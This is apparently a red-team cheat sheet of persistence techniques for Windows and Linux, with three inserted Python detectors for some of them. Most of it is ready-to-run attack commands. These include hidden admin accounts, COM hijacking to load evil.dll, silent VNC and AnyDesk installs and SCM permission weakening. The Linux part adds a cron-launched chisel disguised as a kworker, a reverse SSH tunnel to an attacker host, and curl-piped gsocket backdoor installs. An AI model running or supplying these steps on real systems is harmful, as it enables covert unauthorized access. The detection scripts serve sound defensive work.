Windows
Scheduled Tasks
Hidden Local User
Dollar Sign
Cmd > net1.exe user snovvcrash$ Passw0rd! /add
SpecialAccounts
PS > New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name SpecialAccounts
PS > New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\" -Name snovvcrash -PropertyType DWORD -Value 0 -Force
Suborner
PS > whoami
nt authority\system
PS > .\Suborner.exe /username:snovvcrash$ /password:Passw0rd!
Locate good targets to hijack with Procmon filters:
Path is InprocServer32 (in-process server allowing the specified DLL to be loaded into current process memory space)
Locate CLSIDs from scheduled tasks:
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
{
    # $null on the left so an array-valued ClassId is tested as a whole, not filtered
    if ($null -ne $Task.Actions.ClassId)
    {
        if ($Task.Triggers.Enabled -eq $true)
        {
            if ($Task.Principal.GroupId -eq "Users")
            {
                Write-Host "Task Name: " $Task.TaskName
                Write-Host "Task Path: " $Task.TaskPath
                Write-Host "CLSID: " $Task.Actions.ClassId
                Write-Host
            }
        }
    }
}
Check if a COM component exists under a relevant registry hive by its CLSID:
PS > Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
PS > Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
If it exists under the HKLM hive but not under HKCU, we can hijack this COM component by creating a new item in the latter path:
PS > New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > New-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -Name "InprocServer32" -Value "C:\Windows\Tasks\evil.dll"
PS > New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32" -Name "ThreadingModel" -Value "Both"
PS > Get-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32"
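Defender-side check for the condition described above, added here and not part of the original notes: a per-user CLSID whose InprocServer32 overrides a machine-wide registration, or points at a DLL outside trusted program directories. The allow-list of trusted prefixes is an assumption to tune per environment; the comparison is plain Python, and the winreg collector only runs on Windows.

```python
"""Added example (not from the original notes): flag per-user CLSID registrations
that shadow or replace a machine-wide COM class, the condition the notes above abuse.
The comparison is pure Python; the winreg collector at the bottom is Windows-only."""
import sys

# Locations a legitimate in-process server is normally loaded from
# (assumption: tune this allow-list to your environment).
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")


def find_shadowed_clsids(hkcu, hklm):
    """hkcu/hklm: CLSID -> InprocServer32 default value (None when the key is absent).
    Returns [(clsid, user_dll, machine_dll, reason)] for suspicious user-hive entries."""
    findings = []
    for clsid, user_dll in hkcu.items():
        if not user_dll:
            continue
        machine_dll = hklm.get(clsid)
        if machine_dll is not None and user_dll.lower() != machine_dll.lower():
            reason = "HKCU InprocServer32 overrides an HKLM registration"
        elif not user_dll.lower().startswith(TRUSTED_PREFIXES):
            reason = "user-hive InprocServer32 points outside trusted program dirs"
        else:
            continue  # per-user registration of a DLL from a trusted location
        findings.append((clsid, user_dll, machine_dll, reason))
    return findings


def collect_inproc(root):
    """Read CLSID -> InprocServer32 default value for one hive (Windows only)."""
    import winreg  # deferred: the module only exists on Windows
    result = {}
    with winreg.OpenKey(root, r"Software\Classes\CLSID") as clsid_key:
        for i in range(winreg.QueryInfoKey(clsid_key)[0]):
            clsid = winreg.EnumKey(clsid_key, i)
            try:
                with winreg.OpenKey(clsid_key, clsid + r"\InprocServer32") as k:
                    result[clsid] = winreg.QueryValueEx(k, "")[0]
            except OSError:
                result[clsid] = None  # no in-process server registered
    return result


if __name__ == "__main__" and sys.platform == "win32":
    import winreg
    for hit in find_shadowed_clsids(collect_inproc(winreg.HKEY_CURRENT_USER),
                                    collect_inproc(winreg.HKEY_LOCAL_MACHINE)):
        print(hit)
```

Run it with a native-bitness interpreter, since a 32-bit Python on 64-bit Windows is redirected to the WOW6432Node view of the HKLM classes.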
RID Hijacking
.LNK Shortcuts
VNC
TigerVNC (WinVNC)
TightVNC
Download and unpack MSI:
curl https://www.tightvnc.com/download/2.8.85/tightvnc-2.8.85-gpl-setup-64bit.msi -o tightvnc.msi
msiexec /qb /a tightvnc.msi TARGETDIR=%cd%\TightVNC
move TightVNC\PFiles\TightVNC\tvnserver.exe .
move TightVNC\PFiles\TightVNC\screenhooks32.dll .
rmdir TightVNC /s /q
del tightvnc.msi
Create a password (8 chars):
printf "PASSWOR\0" | openssl enc -des-cbc --nopad --nosalt -K 0123456789abcdef -iv 0000000000000000 -provider legacy -provider default | xxd -p
f408495e54374919
wget http://ftp.de.debian.org/debian/pool/main/v/vinagre/vinagre_3.22.0-8.1_amd64.deb
sudo apt install ./vinagre_3.22.0-8.1_amd64.deb && rm vinagre_3.22.0-8.1_amd64.deb
Install TightVNC server:
New-Item -Path "HKLM:\Software\TightVNC" -Force > $null
New-Item -Path "HKLM:\Software\TightVNC\Server" -Force > $null
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "Password" -Value ([byte[]](0xf4,0x08,0x49,0x5e,0x54,0x37,0x49,0x19)) -Type Binary -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RfbPort" -Value 31337 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RunControlInterface" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RemoveWallpaper" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "AcceptHttpConnections" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "LoopbackOnly" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "AllowLoopback" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RunAsService" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "ServiceDisplayName" -Value "TightVNC Server" -Type String -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "UseVncAuthentication" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "UseControlAuthentication" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "QueryAcceptOnTimeout" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "QueryTimeout" -Value 10 -Type DWord -Force
# cd C:\path\to\tvnserver_exe\and\screenhooks32_dll
Start-Process -FilePath .\tvnserver.exe -ArgumentList "-install -silent" -NoNewWindow -Wait
Start-Service -Name "TightVNC Server"
Get-Service "TightVNC Server"
Uninstall TightVNC server:
# cd C:\path\to\tvnserver_exe\and\screenhooks32_dll
Start-Process -FilePath .\tvnserver.exe -ArgumentList "-remove -silent" -NoNewWindow -Wait
Get-Service "TightVNC Server"
Remove-Item -Path "HKLM:\Software\TightVNC" -Recurse -Force
Stop-Process -Name tvnserver -Force
rm tvnserver.exe, screenhooks32.dll
AnyDesk
Cmd > bitsadmin /transfer job1 https://download.anydesk.com/AnyDesk-CM.exe C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe --install C:\Users\snovvcrash\AppData\Local\AnyDesk --start-with-win --silent
Cmd > del C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > echo Passw0rd! | C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --set-password
Cmd > cmd /c "for /f ""delims="" %i in ('C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i"
Cmd > C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --remove
Keep Awake
Disable sleep when plugged in / on battery:
Cmd > powercfg /change standby-timeout-ac 0
Cmd > powercfg /change standby-timeout-dc 0
Disable hibernate when plugged in / on battery:
Cmd > powercfg /change hibernate-timeout-ac 0
Cmd > powercfg /change hibernate-timeout-dc 0
Disable sleep when closing laptop lid (plugged in / on battery):
Cmd > powercfg -setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
Cmd > powercfg -setdcvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
Apply all settings:
Cmd > powercfg -SetActive SCHEME_CURRENT
Create a scheduled task to wake up:
PS > schtasks /create /tn "Microsoft\Windows\WindowsUpdate\Refresh Group Policy" /tr "cmd.exe /c exit" /sc daily /st 23:00:00 /ru "SYSTEM" /f
PS > Get-ScheduledTask -TaskName "Refresh Group Policy"
PS > $settings = New-ScheduledTaskSettingsSet -WakeToRun
PS > Set-ScheduledTask -TaskName "Refresh Group Policy" -TaskPath "Microsoft\Windows\WindowsUpdate\" -Settings $settings
PS > powercfg /waketimers
SDDL Manipulation
Backup current SDDL for scmanager:
Cmd > sc.exe sdshow scmanager
Change it to allow everyone to create a service:
Cmd > sc.exe sdset scmanager D:(A;;KA;;;WD)
Create a service that will auto run at next reboot:
Cmd > sc.exe create lpesvc displayName= "lpesvc" binPath= "C:\Windows\System32\net.exe localgroup administrators snovvcrash /add" obj= LocalSystem start= auto
Check if scmanager SDDL has been modified:
PS > ConvertFrom-SddlString -Sddl $(sc.exe sdshow scmanager | select -Last 1) | select -Expand DiscretionaryAcl
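A portable way to do the same check without ConvertFrom-SddlString, added here and not part of the original notes: parse the DACL of the `sc.exe sdshow scmanager` output and report allow-ACEs that grant the create-service bit (or generic all) to Everyone, Authenticated Users and similar broad SIDs. The rights table and the sample DACL strings are constructed for the example; the `D:(A;;KA;;;WD)` case is the weakening shown above.

```python
"""Added example (not from the original notes): parse the DACL of an SDDL string,
such as the output of `sc.exe sdshow scmanager`, and report allow-ACEs that let
broad trustees create services, which is exactly the weakening shown above.
Only the DACL grammar needed here is implemented; no Windows API is required."""
import re

# SDDL rights tokens -> access-mask bits (generic, standard, object-specific).
RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x20000, "SD": 0x10000, "WD": 0x40000, "WO": 0x80000,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
    "KA": 0xF003F, "KR": 0x20019, "KW": 0x20006, "KX": 0x20019,
}
SC_MANAGER_CREATE_SERVICE = 0x2  # bit 0x2 on the SCM object ("DC" in SDDL)
# Well-known SIDs that mean "any logged-on user" or wider.
BROAD_TRUSTEES = {"WD": "Everyone", "AU": "Authenticated Users", "BU": "Users",
                  "IU": "Interactive", "AN": "Anonymous", "AC": "All App Packages"}


def parse_dacl(sddl):
    """Return [(ace_type, flags, mask, trustee)] for the D: section of an SDDL string."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        ace_type, flags, rights, _obj, _inherit, trustee = ace.split(";")[:6]
        if rights.lower().startswith("0x"):
            mask = int(rights, 16)  # rights may also be given as a hex mask
        else:
            mask = 0
            for i in range(0, len(rights), 2):  # otherwise two-letter tokens
                mask |= RIGHTS[rights[i:i + 2]]
        aces.append((ace_type, flags, mask, trustee))
    return aces


def assess_scm_sddl(sddl):
    """Findings for allow-ACEs granting create-service (or generic all) to broad SIDs."""
    findings = []
    for ace_type, _flags, mask, trustee in parse_dacl(sddl):
        creates = mask & (SC_MANAGER_CREATE_SERVICE | RIGHTS["GA"])
        if ace_type == "A" and creates and trustee in BROAD_TRUSTEES:
            findings.append(f"{BROAD_TRUSTEES[trustee]} ({trustee}) may create "
                            f"services: mask 0x{mask:X}")
    return findings


if __name__ == "__main__":
    print(assess_scm_sddl("D:(A;;KA;;;WD)"))  # the weakened DACL from the notes above
```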
SharPersist
beacon> execute-assembly SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <BASE64_CMD>" -n "Updater" -m add -o hourly
beacon> execute-assembly SharPersist.exe -t startupfolder -f "UserEnvSetup" -m add
beacon> execute-assembly SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
Linux
Cron
Quick crontab one-liner that does not spawn a duplicate backdoor process if one is already running:
$ echo 'if [ -z "$(pwdx $(pgrep chisel) 2>/dev/null | grep home)" ]; then $(cd /home/user/.local/lib; export PATH=.:$PATH; exec -a "kworker/0:2-events" chisel & disown); fi' > /home/user/.local/.1
$ (crontab -l; echo '* * * * * /home/user/.local/.1') | crontab -
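The `exec -a "kworker/0:2-events"` trick above only rewrites argv[0]; a user-space process still has a readable `/proc/<pid>/exe` link, whereas genuine kernel threads have an empty cmdline and no exe. This added example (not from the original notes) walks `/proc` and flags processes that claim a kernel-thread name but resolve to a real binary; the name pattern list is an assumption to extend.

```python
"""Added example (not from the original notes): spot user-space processes that
masquerade as kernel threads, e.g. a binary started with `exec -a "kworker/..."`
as in the crontab line above. Real kernel threads have an empty cmdline and no
readable /proc/<pid>/exe; a "kworker" with a resolvable exe is a red flag."""
import os
import re

# Assumption: common kernel-thread name prefixes; extend for your kernels.
KTHREAD_NAME = re.compile(r"^(kworker|ksoftirqd|kthreadd|migration|rcu_|kswapd|cpuhp|watchdog)")


def is_masquerading(cmdline, exe):
    """cmdline: argv list as the process presents it; exe: resolved binary path or None.
    True when the process claims a kernel-thread name but is backed by a real binary."""
    if not cmdline:
        return False  # genuine kernel threads have an empty cmdline
    return exe is not None and bool(KTHREAD_NAME.match(cmdline[0]))


def read_proc(pid):
    """Collect (pid, cmdline, exe) for one /proc entry; None if it cannot be inspected."""
    try:
        with open(f"/proc/{pid}/cmdline", "rb") as f:
            cmdline = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
    except OSError:
        return None  # process exited meanwhile
    try:
        exe = os.readlink(f"/proc/{pid}/exe")
    except FileNotFoundError:
        exe = None  # kernel threads (and zombies) have no executable
    except PermissionError:
        return None  # run as root to inspect other users' processes
    return pid, cmdline, exe


def scan_proc():
    """Return every masquerading process found under /proc."""
    hits = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        entry = read_proc(pid)
        if entry and is_masquerading(entry[1], entry[2]):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for pid, cmdline, exe in scan_proc():
        print(f"pid {pid}: argv0={cmdline[0]!r} exe={exe}")
```

Cross-check hits against `/proc/<pid>/comm`, which keeps the executable's real name and is not changed by `exec -a`.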
SSH
Add a temporary rule allowing connections from your IP:
$ sudo iptables -A INPUT -p tcp -s 10.10.13.37 --dport 22 -j ACCEPT
SSH Tunnel in Crontab
#!/bin/bash
if [[ `ps -ef | grep -c 2222` -eq 1 ]]; then
/usr/bin/ssh -nNT -R 2222:localhost:22 [-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa] [-oServerAliveInterval=300 -oServerAliveCountMax=3] -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oIdentitiesOnly=yes -i /home/alice/.ssh/.k nopty@10.10.13.37
fi
Attacker's box:
$ sudo -i
# useradd -ms /bin/false nopty
# mkdir /home/nopty/.ssh
# ssh-keygen -f /home/nopty/.ssh/dummy_key -t ed25519 -q -N ""
# cat /home/nopty/.ssh/dummy_key.pub
# echo 'from="10.10.13.38",command="echo Only port forwarding is allowed",no-agent-forwarding,no-X11-forwarding,no-pty '`cat /home/nopty/.ssh/dummy_key.pub` > /home/nopty/.ssh/authorized_keys
# chown -R nopty:nopty .ssh
Victim's box:
$ curl 10.10.13.37/dummy_key > /home/alice/.ssh/.k
$ chmod 600 /home/alice/.ssh/.k
$ curl 10.10.13.37/callback.sh > /home/alice/.conf
$ chmod +x /home/alice/.conf
$ crontab -e
*/15 * * * * /home/alice/.conf
Global Socket
Install
Victim's box:
$ bash -c "$(curl -fsSL gsocket.io/x)"
$ bash -c "$(wget -qO- gsocket.io/x)"
Connect
Attacker's box:
$ cd ~/tools && bash -c "$(curl -fsSL https://tiny.cc/gsinst)" && cd
$ ~/tools/gsocket/tools/gs-netcat -s "<SECRET>" -i
Clean Up
Victim's box:
$ GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
$ GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
$ pkill gs-bd
Rootkits